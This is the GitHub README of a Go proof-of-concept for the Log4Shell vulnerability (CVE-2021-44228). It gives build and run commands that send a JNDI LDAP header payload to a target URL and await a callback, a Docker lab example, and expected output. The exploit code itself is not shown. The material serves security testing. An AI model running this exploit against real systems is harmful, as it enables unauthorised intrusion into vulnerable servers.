Skip to content

Sorrence/CVE-2021-44228

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2021-44228 PoC (Log4Shell)

⚠️ Disclaimer:
This tool is intended for educational purposes, security research, and controlled test environments only.
Using it against systems without explicit permission is illegal and entirely the responsibility of the user.


📌 Description

This project contains a simple Proof-of-Concept (PoC) exploit for Apache Log4j2 (CVE-2021-44228) vulnerability.
The PoC sends a specially crafted HTTP header with a JNDI LDAP payload to the target.
If the target is vulnerable, it will send a callback to the specified LHOST address.


🚀 Usage

1️⃣ Build

go build -o exploit exploit.go

2️⃣ Run

sudo ./exploit -r "http://<TARGET_URL>/?search=test" -l <LOCAL_IP>
  • -r → Target URL (endpoint of the vulnerable application)
  • -l → Your callback listener IP address (the machine running the PoC)

🛠️ Example

Using the provided Docker vulnerable app:

# Run vulnerable app
docker run --rm --network host ghcr.io/christophetd/log4shell-vulnerable-app

# Run exploit
sudo ./exploit -r "http://127.0.0.1:8080/?search=test" -l 127.0.0.1

Expected output:

[*] Callback started on 1389
[*] Payload sent! HTTP Status: 200
[*] Callback from 127.0.0.1:56789, target is VULNERABLE

About

A simple Log4j PoC written in Go

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages